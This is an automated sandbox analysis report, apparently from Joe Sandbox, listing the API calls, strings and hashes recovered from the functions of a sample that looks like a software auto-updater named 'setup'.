                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C1F445
                                                                                                                          • GetUserDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1F46E
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,00001001,?,00000055), ref: 00C1F48A
                                                                                                                          • GlobalMemoryStatus.KERNEL32(?), ref: 00C1F4C1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileTime$InfoModuleNameSystemUserlstrcpy$AddressCurrentDateDefaultGlobalHandleLanguageLocalLocaleMemoryProcProcessStatusWritelstrlenwsprintfwvsprintf
                                                                                                                          • String ID: $%d MBytes paging file free.$%d MBytes paging file.$%d MBytes physical memory free.$%d MBytes physical memory.$%d MBytes user address space free.$%d MBytes user address space.$%d processor(s), type %d.$%d%% memory in use.$%s, run by %s.$Error occurred at %s.$Executable: 32bit on 64bit platform (WOW64).$Executable: 32bit.$Language : %s - (%d)$Operating system: %s (%s).$Unknown
                                                                                                                          • API String ID: 3249360288-2024363017
                                                                                                                          • Opcode ID: bf57721e95c076d9948bc8d76703ae6b5ae9e4700ea03c0aacf23950a1eb9f40
                                                                                                                          • Instruction ID: 74e9a574a3a9c32669cd242ad059a0cfe531c4eb08cc313b6205229e08d5ff97
                                                                                                                          • Opcode Fuzzy Hash: bf57721e95c076d9948bc8d76703ae6b5ae9e4700ea03c0aacf23950a1eb9f40
                                                                                                                          • Instruction Fuzzy Hash: 39515072D0512C6BDB21AB54CC46FEE73BCEF05704F0441E5F909E2182DAB4AB85AFA5
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C19C23
                                                                                                                          • #17.COMCTL32(00000A18), ref: 00C19C32
                                                                                                                            • Part of subcall function 00C39847: __EH_prolog3.LIBCMT ref: 00C3984E
                                                                                                                            • Part of subcall function 00C3A1E2: __EH_prolog3_GS.LIBCMT ref: 00C3A1EC
                                                                                                                            • Part of subcall function 00C3A1E2: WSAStartup.WS2_32(00000101,?), ref: 00C3A231
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000), ref: 00C19C72
                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 00C19E63
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C19E6F
                                                                                                                            • Part of subcall function 00C2E48B: __EH_prolog3.LIBCMT ref: 00C2E492
                                                                                                                          Strings
                                                                                                                          • Unable to continue. No write permissions in the update location., xrefs: 00C1A3F5
                                                                                                                          • AFX_AUTOUPDATE_200405172224, xrefs: 00C19F41
                                                                                                                          • /cp:, xrefs: 00C19D68
                                                                                                                          • /w:, xrefs: 00C19DDD
                                                                                                                          • /forcebeta, xrefs: 00C19D48
                                                                                                                          • MultiUpdate - Can not located files to update, xrefs: 00C1A218, 00C1A228
                                                                                                                          • Only ONE instace of this program can run at one time., xrefs: 00C19FA9
                                                                                                                          • Could not locate %s.The update program must be run from where %s is located!., xrefs: 00C1A1A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3H_prolog3_$CloseCurrentDirectoryHandleMutexReleaseStartup
                                                                                                                          • String ID: /cp:$/forcebeta$/w:$AFX_AUTOUPDATE_200405172224$Could not locate %s.The update program must be run from where %s is located!.$MultiUpdate - Can not located files to update$Only ONE instace of this program can run at one time.$Unable to continue. No write permissions in the update location.
                                                                                                                          • API String ID: 3154394641-1665516921
                                                                                                                          • Opcode ID: 61da04bf93e2767de1c6076ff29bd065086cb04684ae2a2bd823a129dbeb01a6
                                                                                                                          • Instruction ID: 139b04911ffd2d296182ce8f97e28bff411529f714d8f36bd9318c6bbbb55872
                                                                                                                          • Opcode Fuzzy Hash: 61da04bf93e2767de1c6076ff29bd065086cb04684ae2a2bd823a129dbeb01a6
                                                                                                                          • Instruction Fuzzy Hash: DF32B470901269DEDB24EB64CC99BEDB774AF16300F0041E9E41AA3192DB745FC9EF62
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C277B1
                                                                                                                          • GetCurrentProcess.KERNEL32(00000020,?,00000048,00C1C63F,?,?,?,?), ref: 00C277E7
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00C277F4
                                                                                                                          • GetLastError.KERNEL32 ref: 00C277FA
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00C2781B
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00C27833
                                                                                                                          • GetLastError.KERNEL32 ref: 00C27839
                                                                                                                          • GetShellWindow.USER32 ref: 00C27852
                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00C27861
                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C27875
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00C27890
                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,0000018B,00000000,00000002,00000001,?), ref: 00C278A7
                                                                                                                          • LoadLibraryW.KERNEL32(AdvApi32), ref: 00C278B9
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 00C278D2
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00C278DD
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00C27904
                                                                                                                          • GetLastError.KERNEL32(?), ref: 00C27914
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Token$ErrorLastLibraryOpen$FreeWindow$AddressAdjustCurrentDuplicateH_prolog3_LoadLookupPrivilegePrivilegesProcShellThreadValue
                                                                                                                          • String ID: AdvApi32$CreateProcessWithTokenW$SeIncreaseQuotaPrivilege
                                                                                                                          • API String ID: 1554674823-3770288093
                                                                                                                          • Opcode ID: dcaf5173fcb2ca7caa26c9470dde1811b0ed6641b9eb819d5e5f4811aa05c551
                                                                                                                          • Instruction ID: dc4138c431919c2688bb2dad7665eaff758a75ee65cf09a0bccb9e456afc1467
                                                                                                                          • Opcode Fuzzy Hash: dcaf5173fcb2ca7caa26c9470dde1811b0ed6641b9eb819d5e5f4811aa05c551
                                                                                                                          • Instruction Fuzzy Hash: 0151E8B1904219AFDF119FA4DC89BAEBBB9FF08740F14412AF515B62A0DB709D51DB20
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EUC-JP$ISO LATIN 1$ISO LATIN 2$ISO-10646-UCS-2$ISO-10646-UCS-4$ISO-2022-JP$ISO-8859-1$ISO-8859-2$ISO-8859-3$ISO-8859-4$ISO-8859-5$ISO-8859-6$ISO-8859-7$ISO-8859-8$ISO-8859-9$ISO-LATIN-1$ISO-LATIN-2$SHIFT_JIS$UCS-2$UCS-4$UCS2$UCS4$UTF-16$UTF-8$UTF16$UTF8
                                                                                                                          • API String ID: 0-1853580349
                                                                                                                          • Opcode ID: 9e5b4295e90d69b3c698ec4eecc5340ba8b1d5d8476c17514bb49775322f684c
                                                                                                                          • Instruction ID: e128c18099d7022cc93c726692bde71ede27c276df6507413e06d3c5934cad59
                                                                                                                          • Opcode Fuzzy Hash: 9e5b4295e90d69b3c698ec4eecc5340ba8b1d5d8476c17514bb49775322f684c
                                                                                                                          • Instruction Fuzzy Hash: B332C6616081890ACF718F3099E17F67BA79F66358F9806E9CC96CB242EE13CF4DC251
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00C2C43E
                                                                                                                          • GetLastError.KERNEL32(?), ref: 00C2C451
                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C2C4B8
                                                                                                                          • GetLastError.KERNEL32 ref: 00C2C4C5
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00C2C542
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00C2C590
                                                                                                                          • GetLastError.KERNEL32(?), ref: 00C2C59B
                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C2C5EC
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00C2C60B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find$ErrorLast$AttributesFirst$CloseNext
                                                                                                                          • String ID: \
                                                                                                                          • API String ID: 2822194134-2967466578
                                                                                                                          • Opcode ID: 6a6a08981d08c188f752cae736734a8dc5bcb444408c54137cea68f3184cbed8
                                                                                                                          • Instruction ID: fee675d3083fc197fb02040520ff3e097547cbbbdfa86e499ee8646728d66f84
                                                                                                                          • Opcode Fuzzy Hash: 6a6a08981d08c188f752cae736734a8dc5bcb444408c54137cea68f3184cbed8
                                                                                                                          • Instruction Fuzzy Hash: 6BC1C6B0504B609AE734D674E8CC7FF77D8AF04314F140D1EE5BA825D1DB60AA88EB54
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C24DED
                                                                                                                            • Part of subcall function 00C24CED: GetClassInfoW.USER32(?,?,?), ref: 00C24D07
                                                                                                                            • Part of subcall function 00C24CED: LoadCursorW.USER32(00000000,00007F00), ref: 00C24D3A
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C24F22
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C24F48
                                                                                                                            • Part of subcall function 00C2D4B5: DeleteObject.GDI32(00000000), ref: 00C2D4C4
                                                                                                                          • LoadLibraryW.KERNEL32(MSIMG32.DLL), ref: 00C24F57
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GradientFill), ref: 00C24F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Load$AddressClassCursorDeleteH_prolog3InfoLibraryProc
                                                                                                                          • String ID: GradientFill$KCSideBanner$MSIMG32.DLL$Tahoma$Tahoma Bold
                                                                                                                          • API String ID: 916428825-2494292399
                                                                                                                          • Opcode ID: ff5ddedd7d4c5853c2291923b988c858ba5a7c7560ca193e5a8265b7a4adcd5b
                                                                                                                          • Instruction ID: 79762d60c05287ea3af085abe2a627bf17945107575fb2a4e4f7ee3787a25469
                                                                                                                          • Opcode Fuzzy Hash: ff5ddedd7d4c5853c2291923b988c858ba5a7c7560ca193e5a8265b7a4adcd5b
                                                                                                                          • Instruction Fuzzy Hash: ED4110B0A01706EEDB08DFB5C855BDDFBB4BF14304F50421AE15967281DBB42519DF91
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C35A62
                                                                                                                          • _memcpy_s.LIBCMT ref: 00C35BF3
                                                                                                                          • _memcpy_s.LIBCMT ref: 00C35C62
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?,?,00000000), ref: 00C35D96
                                                                                                                          • GetFocus.USER32 ref: 00C3607F
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C360B5
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00C360CD
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00C3616E
                                                                                                                          • IsWindow.USER32(00000000), ref: 00C36175
                                                                                                                          • SetFocus.USER32(00000000,?,00000007,?,00000000), ref: 00C36180
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableFocus_memcpy_s$EnabledFileH_prolog3PathRemoveSpec
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2321674057-0
                                                                                                                          • Opcode ID: 9c93a38bc867aef25e6ae53be0f6245cead343e04a1d7b4b209f7f4ee016cc83
                                                                                                                          • Instruction ID: 1b0750ba645fc152f07486ae81d9b0f6da54b4fd1b1bdb9f7a013eddf9a88f66
                                                                                                                          • Opcode Fuzzy Hash: 9c93a38bc867aef25e6ae53be0f6245cead343e04a1d7b4b209f7f4ee016cc83
                                                                                                                          • Instruction Fuzzy Hash: 7E32B271E10626DFCB14DFA8C885BADB7B5FF48310F15426EE855AB291DB70AD01CBA0
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1CAA3
                                                                                                                            • Part of subcall function 00C24510: __EH_prolog3_catch.LIBCMT ref: 00C24517
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C2452A
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00C2455A
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,00CB038C,?,?), ref: 00C2457C
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00C245A7
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000000,?,?,?,?,00000354,00C15963), ref: 00C245B9
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,00000354,00C15963), ref: 00C245D4
                                                                                                                            • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
                                                                                                                          Strings
                                                                                                                          • Your current version can not be upgraded. Will download full installer instead., xrefs: 00C1CD4F
                                                                                                                          • Failed to get version information from "%s" ! Aborting..., xrefs: 00C1CB35
                                                                                                                          • ==> Forcing update., xrefs: 00C1CD01, 00C1CD09
                                                                                                                          • Current installed version is %d.%d.%d.%d, xrefs: 00C1CB68
                                                                                                                          • The full installer will be downloaded!, xrefs: 00C1CC55
                                                                                                                          • ==> Newer version found., xrefs: 00C1CCF6
                                                                                                                          • Failed to get version information from "%s"! Aborting..., xrefs: 00C1CC35
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DefaultFileInfoLangQueryUserValueVersion$H_prolog3_H_prolog3_catchSizeUpdateWindow
                                                                                                                          • String ID: ==> Forcing update.$==> Newer version found.$Current installed version is %d.%d.%d.%d$Failed to get version information from "%s" ! Aborting...$Failed to get version information from "%s"! Aborting...$The full installer will be downloaded!$Your current version can not be upgraded. Will download full installer instead.
                                                                                                                          • API String ID: 158085385-1079758262
                                                                                                                          • Opcode ID: 40c683cb3191703084b5e1e2d460e432e28c983d9dd30c18563be64fb2f45280
                                                                                                                          • Instruction ID: a7e16711789332059f08143fa83a46bb3e1dd1acad2da79380f43988aa922185
                                                                                                                          • Opcode Fuzzy Hash: 40c683cb3191703084b5e1e2d460e432e28c983d9dd30c18563be64fb2f45280
                                                                                                                          • Instruction Fuzzy Hash: 21A1C170900254AFDF14DBA4CC91BEEB7B9AF54300F0445BAF949F7182EA305E95EB61
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C4078E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00C4079E
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C407A7
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C407B5
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000004,?,00000003,?,00C39F15,00C39482,00000003,?,00000004,00C39482), ref: 00C407EC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleInfoLocaleModuleProc
                                                                                                                          • String ID: GetLocaleInfoEx$kernel32.dll
                                                                                                                          • API String ID: 1461536855-1547310189
                                                                                                                          • Opcode ID: 39dc0d4ab44a2a00f3694b325ac848fac2d9a8d09a5a17f037fa20ff2ba209c2
                                                                                                                          • Instruction ID: 1345b012b3d87540aead1cd982de8f310fd3c81d87e34d9ec30186547c2147a5
                                                                                                                          • Opcode Fuzzy Hash: 39dc0d4ab44a2a00f3694b325ac848fac2d9a8d09a5a17f037fa20ff2ba209c2
                                                                                                                          • Instruction Fuzzy Hash: 0E01FB35540256EF8F011FA0EC4CA9E3F69FF087A57144115FE05A2160DB35D9119FA1
                                                                                                                          APIs
                                                                                                                          • OpenClipboard.USER32(?), ref: 00C12059
                                                                                                                          • EmptyClipboard.USER32 ref: 00C12063
                                                                                                                          • GlobalAlloc.KERNEL32(00002002,?,?,00C11EF8,?,?), ref: 00C12072
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C1207F
                                                                                                                          • _strncpy.LIBCMT ref: 00C1208A
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00C12093
                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00C1209C
                                                                                                                          • CloseClipboard.USER32 ref: 00C120A7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock_strncpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4184754841-0
                                                                                                                          • Opcode ID: 414776b4a6a9b1d58cd76bfe02d1820a88ca8354e312591765cf0eaffccfbe12
                                                                                                                          • Instruction ID: b0bd64c7030ea6ab4313982deb842fa10fe19da2bec48a8d3c8c8ba5097cef3f
                                                                                                                          • Opcode Fuzzy Hash: 414776b4a6a9b1d58cd76bfe02d1820a88ca8354e312591765cf0eaffccfbe12
                                                                                                                          • Instruction Fuzzy Hash: 1F01F535100211ABC7206F60DC0DBEE7BA8BF4A711F05801AF509862A5DF30D594EB60
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C40FA7
                                                                                                                          • PathIsUNCW.SHLWAPI(?,?,?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C41057
                                                                                                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2), ref: 00C4107B
                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,00C40F0D,?,?,00000000,?,00C34DF0,4641B5ED), ref: 00C40FDA
                                                                                                                            • Part of subcall function 00C40F5B: GetLastError.KERNEL32(?,?,?,00C4108C,?,?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C40F67
                                                                                                                            • Part of subcall function 00C40F11: PathStripToRootW.SHLWAPI(00000000), ref: 00C40F45
                                                                                                                          • CharUpperW.USER32(?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C410A9
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C410C1
                                                                                                                          • FindClose.KERNEL32(00000000,?,00C34DF0,4641B5ED,?,?,?,?,00C946A2,000000FF), ref: 00C410CD
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2323451338-0
                                                                                                                          • Opcode ID: 9da95b74b1a0ac3bd21f0013b132f3c4b942716f1a6a69f73ddcac41b329f2b1
                                                                                                                          • Instruction ID: 9693ebd30dffd9135ebf879e1c19160da84f611cfd6ad4fe26b5fe8eb7101f06
                                                                                                                          • Opcode Fuzzy Hash: 9da95b74b1a0ac3bd21f0013b132f3c4b942716f1a6a69f73ddcac41b329f2b1
                                                                                                                          • Instruction Fuzzy Hash: 65418271504219AFEB24AB64CD8DFBEB77CBF00310F144699F95992191EF31AEC4DA60
                                                                                                                          Similarity
                                                                                                                          • API ID: __floor_pentium4
                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                          • Opcode ID: c6bfa9430899e19b6bdad392c2f50b2531058efea5d5a0c93cb9e11343ecb488
